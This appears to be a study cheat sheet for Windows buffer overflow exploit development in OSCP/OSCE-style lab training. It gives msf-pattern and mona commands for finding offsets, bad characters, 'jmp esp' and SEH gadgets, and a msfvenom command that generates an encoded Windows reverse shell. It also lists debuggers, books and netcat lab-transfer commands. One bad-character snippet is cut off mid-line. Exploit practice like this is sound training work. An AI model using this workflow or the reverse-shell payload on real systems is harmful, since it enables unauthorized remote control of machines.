Tutorials / Methodologies

msf-pattern_create -l $length
msf-pattern_offset -l $length -q $EIP

import sys
badchars = ""
for x in range(1,256):
    # sys.stdout.write("\\x" + '{:02x}'.format(x))
    badchars += "\\x" + '{:02x}'.format(x)

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"

# keep the same order of outputs
   nasm > jmp esp
   00000000  FFE4              jmp esp

# select a dll module
!mona modules
# find address of "jmp esp"
!mona find -s "\xff\xe4" -m "libspp.dll"
# find "pop,pop,ret" for SEH
!mona seh -m "$module"

# generate Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f c -e x86/shikata_ga_nai -b "\x00"


  • Immunity Debugger: A powerful new way to write exploits, analyze malware, and reverse engineer binary files (whitepaper, course)

  • OllyDbg: A 32-bit assembler level analysing debugger for Microsoft Windows (tut)

  • Windbg: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows (tut)

  • edb: A Linux equivalent of the famous Olly debugger on the Windows platform.

  • Boofuzz: Network Protocol Fuzzing for Humans

  • mona: A Python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform) (tut, cheatsheet)

    !mona findmsp
    !mona modules [ -o ]: (-o: only in the application which is more reliable)
    !mona jmp -r esp [ -o ] 
    !mona seh       
    !mona seh -m -o
    !mona bytearray -cpb "\x00"
    !mona compare -f c:\mona\pcmanftpd2\bytearray.bin -a 0012ED6C
    !mona find -s "\xff\xe4" -m "libspp.dll"
    !mona findmsp
  • WinDBG: A kernel-mode and user-mode debugger that is included in Debugging Tools for Windows

Exploitation for Practice

Structured Exception Handler (SEH)

More Targets

Advanced Topics for OSCE


  • Hacking - The Art of Exploitation
  • The Shellcoder’s Handbook: Discovering and Exploiting Security Holes
  • Buffer Overflow Attacks: Detect, Exploit, Prevent
  • Writing Security Tools and Exploits
  • Penetration Testing with Shellcode: Detect, exploit, and secure network-level and operating system vulnerabilities
# From Kali, run first
~/OSCP/windows_buffer_overflows$ nc -l -p 1234 > VulnApp1.exe
# From Windows
C:\Tools\windows_buffer_overflows> nc -w 3 1234 < VulnApp1.exe

# Windows 10: Bridged Adapter network
# Kali: NAT network
  • Download windows 10 x86 ISO: https://www.microsoft.com/en-gb/software-download/windows10ISO